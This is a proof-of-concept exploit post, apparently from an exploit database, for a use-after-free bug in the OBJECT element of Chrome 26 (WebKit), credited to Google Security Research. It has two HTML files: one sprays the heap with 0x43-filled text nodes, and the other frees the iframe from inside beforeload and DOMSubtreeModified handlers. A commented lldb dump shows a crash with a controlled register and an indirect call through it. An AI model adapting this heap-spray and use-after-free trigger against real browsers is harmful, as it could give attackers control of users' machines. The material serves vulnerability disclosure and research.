Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC
来源:Google Security Research 作者:Google 发布时间:2016-08-17  
#---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
<html>
    <head>
        <script>
            function sprayOne(mem, size, v) {
                                var a = new Uint8ClampedArray(size - 20);
                                for (var j = 0; j < a.length; j++) a[j] = v;
                var t = document.createTextNode(String.fromCharCode.apply(null, new Uint16Array(a)));
                                mem.push(t);
            }
            function dsm(evnt) {
                // spray
                var mem = [];
                for (var j = 20; j < 8192; j++) sprayOne(mem, j, 0x43);
                
/*
 
Chromium release build 28.0.1461.0 (191833), built with options:
 
GYP_GENERATORS=ninja GYP_DEFINES='component=shared_library mac_strip_release=0' gclient runhooks
 
lldb attached to Chromium in --single-process mode:
 
* thread #28: tid = 0x3803, 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderBox.h:155, stop reason = EXC_BAD_ACCESS (code=1, address=0x43434617)
    frame #0: 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderBox.h:155
   152      virtual IntRect borderBoundingBox() const { return pixelSnappedBorderBoxRect(); }
   153 
   154      // The content area of the box (excludes padding - and intrinsic padding for table cells, etc... - and border).
-> 155       LayoutRect contentBoxRect() const { return LayoutRect(borderLeft() + paddingLeft(), borderTop() + paddingTop(), contentWidth(), contentHeight()); }
   156      // The content box in absolute coords. Ignores transforms.
   157      IntRect absoluteContentBox() const;
   158      // The content box converted to absolute coords (taking transforms into account).
 
(lldb) reg read
General Purpose Registers:
       eax = 0x43434343
       ebx = 0x12ae436c
       ecx = 0x00000018
       edx = 0x0edab374
       edi = 0x0edd6858
       esi = 0x12ae436c
       ebp = 0xb9bf8e38
       esp = 0xb9bf8d50
        ss = 0x00000023
    eflags = 0x00010286
       eip = 0x07b617e4  libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() + 20 [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderWidget.cpp:172
  libwebcore_rendering.a`WebCore::RenderWidget::updateWidgetGeometry() + 15 at RenderWidget.cpp:172
        cs = 0x0000001b
        ds = 0x00000023
        es = 0x00000023
        fs = 0x00000023
        gs = 0x0000000f
 
(lldb) disass
libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() + 20 [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderWidget.cpp:172
libwebcore_rendering.a`WebCore::RenderWidget::updateWidgetGeometry() + 15 at RenderWidget.cpp:172:
-> 0x7b617e4:  calll  *724(%eax)
   0x7b617ea:  movl   %eax, -180(%ebp)
   0x7b617f0:  movl   (%ebx), %eax
   0x7b617f2:  movl   %ebx, (%esp)
 
*/
            }
        </script>
    </head>
    <body>
        <iframe src="object-beforeload-frame-chrome.html"></iframe>
    </body>
</html>
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
 
 
 
 
 
#---object-beforeload-frame-chrome.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
<html>
    <head>
        <script>
            var nb = 0;
            function handleBeforeLoad() {
                if (++nb == 1) {
                    p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                } else if (nb == 2) {
                    p.removeChild(f);
                }
            }
            
            function documentLoaded() {
                f = window.frameElement;
                p = f.parentNode;
                var o = document.createElement("object");
                o.addEventListener('beforeload', handleBeforeLoad, false);
                document.body.appendChild(o);
            }
 
            window.onload = documentLoaded;
        </script>
    </head>
    <body></body>
</html>
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
 
## E-DB Note: Source ~ https://bugs.chromium.org/p/chromium/issues/detail?id=226696
 